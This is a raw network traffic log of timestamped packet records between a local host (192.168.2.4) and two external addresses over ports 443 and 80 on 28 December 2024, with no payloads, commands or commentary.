Dec 28, 2024 09:33:14.664263964 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:16.463493109 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:16.464055061 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:16.464086056 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:16.465488911 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:16.465585947 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:16.470186949 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:16.470300913 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:16.509198904 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:16.509239912 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:16.628052950 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:16.842436075 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:16.842559099 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:16.842602015 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:16.843575954 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:16.843597889 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:28.583235979 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.702794075 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.702876091 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.703948021 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.823761940 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.823776960 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.823781967 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.823786974 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.823838949 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.823878050 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.823909998 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.823925972 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.823926926 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.823951006 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.823965073 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.824007034 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.824016094 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.824069977 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.943052053 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.943166971 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.943384886 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.943438053 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.943526030 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.943572998 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.943593979 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.943624973 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.943634033 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.943670988 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.943681002 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.943718910 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.943749905 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.943794966 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:28.985515118 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:28.985704899 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.105580091 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.105659962 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.149534941 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.149604082 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.265610933 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.353638887 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.353760004 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.593595982 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.593733072 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.680845976 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.681096077 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.681168079 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.713444948 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.713520050 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.800843954 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.800857067 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.800868034 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.800878048 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.800909996 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.800945997 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.800956964 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.800962925 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.800968885 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.801007986 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801014900 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.801055908 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801068068 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801074028 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.801121950 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.801162958 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801192045 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801208973 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.801253080 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.801290989 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801301956 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801357985 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.801407099 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801470995 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801534891 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801592112 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801661015 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801815987 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801863909 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.801956892 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802093029 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802236080 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802318096 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802350998 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.802359104 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802402020 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.802408934 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802453995 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.802505016 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802547932 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.802556992 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802596092 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802635908 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.802654982 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.802727938 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.802769899 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.833235025 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.833308935 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.877477884 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.877537012 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.920614958 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.920644045 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.920655966 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.920690060 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.920730114 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.920756102 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.920789957 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.920808077 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.920881987 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.920933962 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921034098 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921076059 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921138048 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921214104 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921278000 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921366930 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921422005 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921444893 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921539068 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921551943 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921616077 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921626091 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921721935 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921801090 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921937943 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921947956 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.921984911 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922002077 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922029018 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.922075987 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.922121048 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922166109 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.922219992 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922230005 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922244072 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922262907 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.922264099 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922296047 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922302961 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.922314882 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.922343016 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922349930 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:29.922364950 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922429085 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922450066 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922499895 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922542095 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922636986 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922673941 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922719002 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922770023 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922811031 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922930956 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922940969 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.922971964 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923023939 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923037052 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923094034 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923105001 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923173904 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923186064 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923250914 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923261881 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923391104 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923399925 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923443079 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923480988 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923548937 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923635006 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923644066 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923713923 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923723936 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.923732996 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.952856064 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.952959061 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:29.997024059 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.040317059 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.040338039 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.040348053 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.040368080 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.040455103 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.040555954 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.040587902 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.040700912 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041044950 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:30.041135073 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:30.041485071 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041565895 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041604042 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041656017 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041706085 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041717052 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041788101 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041798115 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041883945 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.041929007 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042006969 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042037010 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042102098 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042143106 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042258024 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042282104 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042385101 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042396069 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042543888 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042581081 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042648077 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042658091 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042674065 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042684078 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042754889 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042766094 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042839050 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042905092 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042916059 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042924881 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042963982 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.042992115 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043061972 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043072939 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043178082 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043188095 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043230057 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043240070 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043292046 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043302059 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043384075 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043395996 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043435097 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043452978 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043504000 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043589115 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043597937 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043678999 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043689013 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043693066 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043724060 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043735027 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043783903 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.043793917 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.044064045 CET	49732	80	192.168.2.4	194.87.58.92
Dec 28, 2024 09:33:30.161102057 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161117077 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161135912 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161144972 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161154032 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161170959 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161261082 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161303997 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161386967 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161454916 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161472082 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161546946 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161618948 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161629915 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161650896 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161770105 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161788940 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161807060 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161854982 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161906958 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.161923885 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162008047 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162024975 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162077904 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162147045 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162226915 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162235975 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162281036 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162293911 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162354946 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162367105 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162425995 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162458897 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162554026 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162564039 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162636042 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162646055 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162722111 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162731886 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162816048 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162825108 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162859917 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162904978 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162987947 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.162997007 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163050890 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163192034 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163201094 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163225889 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163307905 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163325071 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163373947 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163383961 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163393021 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163609028 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163626909 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163666964 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163702011 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163754940 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163855076 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163865089 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163939953 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.163994074 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164005041 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164021015 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164118052 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164128065 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164201021 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164215088 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164280891 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164289951 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164381027 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164405107 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164544106 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164560080 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164664030 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164673090 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164724112 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164735079 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164786100 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164845943 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164855957 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164954901 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164964914 CET	80	49732	194.87.58.92	192.168.2.4
Dec 28, 2024 09:33:30.164974928 CET	80	49732	194.87.58.92	192.168.2.4
